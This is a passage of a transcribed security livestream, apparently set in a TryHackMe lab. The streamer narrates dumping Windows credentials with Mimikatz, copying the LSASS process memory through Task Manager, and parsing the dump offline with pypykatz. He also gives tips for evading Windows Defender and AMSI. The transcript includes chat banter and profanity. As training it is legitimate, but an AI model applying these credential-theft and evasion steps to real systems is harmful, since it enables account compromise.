debug privileges. It needs to be running a system, and it needs debug privileges. So privilege debug is what you need to put in. And it says this is the, okay, we're good to go. Like, we have debug privileges thing. We've given, Mimikatz gives itself debug privileges because it's running a system, and it has the power to do that. The most common command you're going to run with Mimikatz is in the securlsa module. When in Mimikatz commands, the first part is the module, and then there's this double colon delimiter, and then this is the actual command that you're executing, the debug privilege. So we're in the securlsa module, we're going to execute the logon passwords command. And oh my goodness, so much stuff just happened. Okay? So much stuff just happened. Just got my hands on the Whispergate samples, massive Ukraine attack. I did hear about that on Twitter. I heard about that on Twitter. I would be excited to take a look at some of that too. It sounds interesting. So in here, we're seeing that the Al-Hazred user is logged in. We see that there is an NTLM hash in here. This is the NTLM hash. This is a known password. Like, we are this user. We added this user. But you see the NTLM hashes are in here. What other users do we have here? We have some system accounts, which is not important. This is their password. The password is usually a randomly generated sequence of hexadecimal, which is not interesting. Here we have a Wadamet user. And oh my goodness. Oh my goodness. What am I seeing here, chat?
A fine addition to my collection.
That is a fine addition to our collection. So we do have credentials. These are clear text credentials. So typically, LSAS will not store clear text credentials. Interestingly, the W digest is not storing clear text credentials, but the Kerberos is. I'm wondering why that's the case. Normally, if you see clear text credentials, it's going to be here. It doesn't do this by default anymore. There used to be a function in Windows called W digest where it would store your clear text credentials in memory, which was obviously a bad thing. And Mimikatz knows how to dump those out. I'm wondering why it's being stored down here in the Kerberos section. That's a little bit strange. But regardless, we have some fine additions to our collection here. So let's go ahead and add those credentials to our collection. Wadamet username. And nothing to worry. Indeed, you have nothing to worry about. No concerns. Oh, let's do Stream Raiders. Get in there, boys. No pussies in my Stream Raiders battles. Serovian Ghost with the most kills and most assists. I guess I'll just use my thing there. There we go. Hey, California 909, good to see you. All right, let's see if there are any other credentials that we found in here that are usable. Wadamet's credentials seem good. So a lot of times you'll get all kinds of service accounts and machine accounts that have logged in. Here we have another service account. Those aren't really useful to you. You're typically looking for domain users for the most part. Okay, so that's all. So that's the most common function that you're going to use Mimikatz for. Are you still using Empire? We actually modified it. You missed it, California. We modified it so that Empire now generates an agent payload that completely bypasses Windows Defender. That was what we did for the majority of the stream today. And let's do the other thing. So I need procdump64 to demonstrate this. So the easiest way to do this is going to be with procdump64, unless Empire has a module for it. Let's see if Empire has a module for it. So Empire has a variety of modules. Let's get an agent again. See. Windows. Tasks. Execute. May not have the appropriate permissions. It's owned by system. Maybe I can't. Let's just exit out of here. Let's just execute it through here again. Okay, we get a new agent. So how do we do modules? Interact with cache. Help. So so Empire has a lot of fucking modules that you can execute. How do I use modules? Because they've changed this interface since the last time I've used it. Okay, so you can actually do a PowerShell import as well. So we could have imported mimikatz.ps1. Is there... Module, PowerShell, collect. So this is screenshotting. Inject shellcode. A lot of this is all stuff that's stolen from Cobalt Strike. Or it's not stolen from Cobalt Strike, but it's aping Cobalt Strike. Like, there's, like, enumeration stuff, and, like, I'm confused. Like, there's all kinds of other stuff you can run. Which came first, Cobalt Strike or Metasploit? Metasploit came first because Cobalt Strike was originally a fork of Armitage, which is like a GUI front end for Metasploit. Cobalt Strike was built off of a GUI front end for Metasploit. And it's since become its own thing, but it was originally a fork. Again, you'll pardon my unfamiliarity with this. Okay. Let's see if there's a PowerShell script for dumping a memory process. Oh. Let's just turn this off. Dump memory. Oh, what am I even thinking? I could just do it here. The fuck am I doing? Okay, we're gonna go in here. Where is LSAS? This guy. Let's go into view. LSAS.exe is what we're looking for. This guy right here. We're going to right-click on that. We're going to create dump file. File has been successfully saved. So we're creating a copy of the LSAS process. And now we're going to download it. Download. And I guess I can just put this in here. Please don't crash the agent. Please don't crash the agent. Please don't crash the agent. Okay. How do I view the status? We download file name. Okay. View and then 1. What? Oh. It errored out. Like, okay. Empire is, I don't know about this one, boys. Okay, well, it's throwing an error when I try to download files. So, Empire, not great. Okay, that's what we're learning from this. Maybe try other things other than Empire. Okay? Maybe try things other than Empire, is what I'm trying to say. I guess we can... Here's lsas.dump. How can I download this now? I could try and copy it and put it in the web root. Is there an inet pub? Web? XAMPP. Is there an images? Is it here? Images. There we go. Let's paste it here. Okay, let's just download it from there. This is kind of jerry-rigged at this point. What's it called? It's just Empire does not seem to like work. Like, let's put it that way. So I'm kind of making it up as I go along. Oh, come on. Oh, it's in images. I forgot I put it in the images directory. Images. Oh. Yeah, I mean, it doesn't seem to be getting it. Is it being removed or something? Nope, it's there. Great. Evil WinRM. We know Evil WinRM works. Proxy chains 4. Evil WinRM. Attack I 10. Evil WinRM is good. We don't need that. I need the IP address. 10.200.137.31. Attack U is my user that I created. The password is Cthulhu 1. I am somewhat frustrated with Empire today, kids. I am somewhat frustrated with Empire. Create dump file. Because I couldn't remember where it was located. Oh, come on. We're erroring out now, too? WinRM authorization error. Is that the incorrect password or something? I logged in over here. Or is WinRM just not enabled? Fuck. WinRM just isn't enabled, is it? Does an Empire support PowerShell? It does. But I was trying to take the path of least resistance here. This is very frustrating. Like, I don't know how hard it is to get a download function working. Quick default. Perfect. WinRM quick config. Perfect. That's what I want. Thank you, Windows, for making that easy. Already running. So why am I getting an authorization error? I'm in the remote desktop users. Come on, dude. I'm just trying to... I am very confused. That should be the correct password. And I should be able... I don't know why I'm getting a WinRM authorization error. When you do the download command in PE, does the oath need to be in quotes? Does the oath? You mean the path? It was erroring out otherwise. I mean, it errors out anyways. I guess we can try putting it in quotes. Yeah, it's broken. Like, I don't know what to tell you. This is just busted. It's like this is a Python error. Like, it's Is there a CD command at least? Of course not. God, this is a nightmare. Okay. A base 64 and copy isn't going to work. It's a very large file. What? This does not need to be this difficult to just download a file from the server. I guess we can try those other credentials. I don't understand why my credentials are not working. Wadamet. If WinRM is running, I don't see why. What a fuck. I'm trying to give Empire as many chances as I can here, but this is a... There we go. So it looks like, for whatever reason, I don't know why, I'm local administrator and I added myself to remote desktop users. But for whatever reason, I could not get in there. Are we in the administrators group? We are. Okay, so we are in the administrators group. Let's go ahead. CD into this directory. Okay, download. This is going to take fucking forever. God damn it. So the LSAS process is large, as you can see. It is thick. God damn it. Everything the hard way today. Boy, oh boy, everything the hard way. And of course we don't have zip or anything on here, do we? Jeez. Now, there's no zip on the... There's no zip. Compressed folder. Okay, no, we can compress it. Never mind. So that is much smaller. Okay, so let's just kill this. Download LSAS. Okay, that was much quicker. Good. Okay, cool. Okay, unzip. What? Did it not down? Else, everything the fucking hard way. RML, that's not the whole file. Thought it was just called LSAS, but it turns out Windows is just hiding the file extension. My bad. Okay, we're downloading. This is substantially smaller, but it's still going to take a minute. God, what a nightmare. Holy shit. Just getting the ability to download a file. Empire can't pull it off. Holy shit. Wow. Painful. I'm guessing FreeRDP doesn't support clipboard sharing. It does. It does. But I don't think it supports file downloads. Feel like a fit deck? Is it time for a fit deck? Is there a fit deck in the queue? Mods, is there a fit deck in the queue? Is there any alternative to Empire? There's like a million, dude. There's like a million C2 frameworks these days. There's Cobalt Strike. Cobalt Strike is the industry standard, but for open source solutions, you got your Covenant, you got Empire, you got Merlin, you got Sliver. You've got, there's so many of them now. There's dozens. There's dozens of C2 frameworks out there. And that doesn't even speak for the number of, like, custom ones that people have written over the years. Yeah, now there's a fit deck redemption. So let's do a quick fit deck while we're waiting for the this download. Do sit-ups again, I guess. I just want to demonstrate how I would typically use Mimikatz. On a real assessment, I would not typically run Mimikatz on a target. I would usually do what I just did, dump the LSAS process, and use it to, and then download it like I am right here, and then run Mimikatz offline. That's what I would usually do. So I'm demonstrating that right now as well, for better attacker methodology. I gave you your eye contact. Fucking weirdos. Okay. So we're 51% done. Where are we on Stream Raiders? Let's just let it ride in Stream Raiders. Here we go. We're letting it ride. So you stream standing up? I do. I find it helps keep me energized. See, easy. We did not need those extra 10 minutes. 4 hours standing up, yep. You get used to it. It's healthier than sitting down for 4 hours, that's for sure. Do you have one of those foot mats? No, I just wear shoes. I keep meaning to get one of those foot mats that you stand on. I do need to get one of those. It would be helpful. I wear shoes. It's a little bit more comfortable than standing in bare feet on carpet. Serovi and Iluvayan with the most kills and most assists. I wish standing desks weren't so expensive. They're not always expensive. The one I use is from IKEA. The one I use is from IKEA, and it's like I can raise it and lower it. It's on mechanical servos that I can raise and lower. And it was only like, $300, I think. It's been a couple of years since I bought it, but it was like $300 when I bought it. I recommend it. I got an IKEA one. It sucks out loud. Al's was sold out. Oh yeah, you got the flimsier one. There's multiple ones you can get, and there was like a nice thick flimsy one. But there's a thin one. You're gonna want the thick ass one. The thick ass one. This one is great. I haven't had a single problem with this one. Mine was more expensive. Well, the joke was on you, wasn't it? The joke was on you. All right, so this is almost done. Let's get Pie Cats. Do I have Pie Cats on here? I do not. So let's go get it. So Pie Cats is a Python implementation of Mimikatz. So that you can run Mimikatz on Linux. I could also put that LSAS dump on my dev box and run Mimikatz on there, the standard Mimikatz. Those are both options for you. I'm going to demonstrate Pie Cats, though. How do I install it? Oh, I bet you it's just a pip. Yeah, it's a pip thing. Yeah, it's just pip3 install. I'm an idiot. Okay. All right. We can just do a pip. How much did yours cost? It was like 300, 400 bucks, I think. The one that I have. Mine is a corner one, isn't balanced right. Yours is thinner, I think. You have like there's like a thinner board. Mine, like the desktop of mine is like more than an inch thick. Like it's a thick piece of wood. Like the actual desk itself is a thick piece of wood. I used to have the corner one, and I agree, it was a piece of garbage. You don't want that flimsy piece of garbage, and you want this nice thick boy. You want a thick boy. You of all people should know that you want a nice thick boy. Okay, so here's PyPyCats. It's installed now. We're not getting the secrets from the live machine. It's PyPyCats LSA because we're getting secrets from a memory dump. And then we want just the memory file, huh? Okay. Did we finish downloading it? We did. Okay. So let's go back to TryHackMe. Going into Holo. And then unzip lsas.ezip. So now we have lsas.dump here, and that looks like the proper size of the file. So we'll do PyPyCats lsa lsas.dump. Choose from mini dump. Oh, it needs to be a mini dump. Mini dump option. And there we go. You see, we get the same output. Notice we get the same output as using Mimikatz live on the host, but this is much sneakier. Okay, this is much sneakier. You don't have to run Mimikatz on the target. This is much better for many, many reasons. This is generally the method you're going to want to use to dump credentials using Mimikatz. Interestingly, we do not get the clear text credentials. Mimikatz must be doing something different that PyPyCats isn't doing to get the clear text credentials of the Watamet. Oh no, here it is. It was just a different instance, but there it is. There's those clear text credentials. So, does anybody have any questions about that? About using Mimikatz? And by the way, you can dump the LSAS process using, even if Windows Defender was active. Even if Windows Defender is active, you can dump the LSAS process. You wouldn't be able to use procdump to do it. We'll turn this back on. But you can do it right here from Task Manager. Just right-click on lsas.exe, create dump file, and the dump is created. No Windows Defender. That's built-in Windows functionality. And then you just download the LSAS dump, which apparently is much harder than it should be in Empire. And then you run PyPyCats on it offline. Or I could have transferred it to my Windows machine and run Mimikatz on my Windows machine. Okay? Little LSAS. There you go. So, that's as far as we're going to make it today. We're more than 4 hours in. That's as far as we're going to make it today. But I'll stick around a little bit. Does anybody have any questions about what we covered today? Because we did a lot of shit today. We went in deep. Why are passwords saved in clear text? I don't know in this case. That is weird. wdigest, normally you have to enable the wdigest in order for that to happen. All it is changing a registry key, which is not hard to do. But usually you don't do it because there's monitoring software that can find that kind of thing if the LSAS registry key is set. But it's being set in the Kerberos section. So for some reason, Kerberos is caching credentials in memory, and I don't really know why. So the key to bypassing AV is to run things in memory and disable AMSI. Yeah, in general, yes. In general, it's better to stay in memory whenever you can. Avoid writing to disk if you can get away with it. And if you need to write to disk, then do so with an obfuscated executable. Anybody else have any questions? Just getting here before you go take my Prime, you sexy. Hey, thank you, G-Nade.
Must hunt.
With the 8 months
Just
Prime
getting here, but before you go take my Prime, you sexy you.
That's so kind of you. That's so kind of you. Thank you so much. I really do appreciate it. Does it matter if you use the Python version or the exe version for Windows for attacking Active Directory? No. Both of them will give you the same output. It'll just make both of them will give you the same output. But obviously, if you want to run PyPyCats is necessary for Linux in most cases. Is payload obfuscation hard to do when you're trying to cross-compile from a Linux dev box to a Windows test box? No. I did that with Nim. If you're doing cross-compilation with a language that's set up to do cross-compilation, then you can, it's no harder writing the code on a Linux box than it is on a Windows box. Do Windows servers clear the temp folder registry regularly? No. Not in my experience. Any other questions? We're just wrapping up. I'm out of water. It's a good time. So again, this stream will be up. It'll be restreamed on YouTube tomorrow, and from that point on, the VOD will be stored on YouTube as well as on Twitch. On Twitch, Twitch only stores my VODs for the next 60 days, but YouTube will store them in perpetuity. So that is the plan going forward. Any other questions, comments, threats, bribes, concerns? Does Star have any long cats available? I don't know where she is. She's probably napping somewhere. She might be in the... I'm not going to go look for her right now, but I'm sure she does have a long cat. It's just a question of if she wants to show it off or not. Where'd you get the Cephalopod cup? This was a gift from my brother, actually. This is a Cthulhu cup. It's a chalice, if you will. If you will. But my brother gave me that for Christmas. Is Empire worth learning with all these struggles you're going through if you can't afford Cobalt Strike? Yeah, probably. I don't know why I was having difficulty downloading. That seems very strange to me. Maybe I was using the download command incorrectly. I'm not sure. And Mimikatz just errored out. I don't know what was going on with that either. So, I don't know, man. Give it a shot. Like, again, it is open source. Keep in mind, you're not paying money for Empire. It can't hurt to give it a shot. Could it be because you're going through proxy chains? The agent is not going through proxy chains. The agent is communicating with me directly. It is not going through proxy chains. All right. We're going to raid Ira Sakai, a fellow hacker who's apparently doing... he's just doing some hacking, doing some learning, talking with chat. So it seems pretty chill. Let's head on over there. Let's bring him the glad tidings of Dread Cthulhu. Are you planning on making your OC2 framework? I am. I actually am working on one. Guess what language it's written in, Jiffaram? It's not public yet. It's in a private repo on my GitHub. And it's not ready to be shown off yet. Like its basic functionality is in place. But it's not ready to be shown off. It's going to be a different kind of C2 network, a C2 framework than most of these are. But I am working on one, actually. All right. So bring Ira Sakai, glad tidings of Dread Cthulhu. Thanks for being here on this fine, fun day Sunday. Again, it'll be restreamed on tomorrow if you missed anything. I'll be back on Newbie Tuesday. We're not going to be doing more Holo on Newbie Tuesday. On Newbie Tuesday, I think we're just going to do some Proving Grounds. It's been a little while since we've done some Proving Grounds, so we'll do some of that. Go to bed tonight knowing a little bit more than you did yesterday. I'll see you all again when the stars are right. Have a good night. Get vaccinated. Stay safe. I love you all.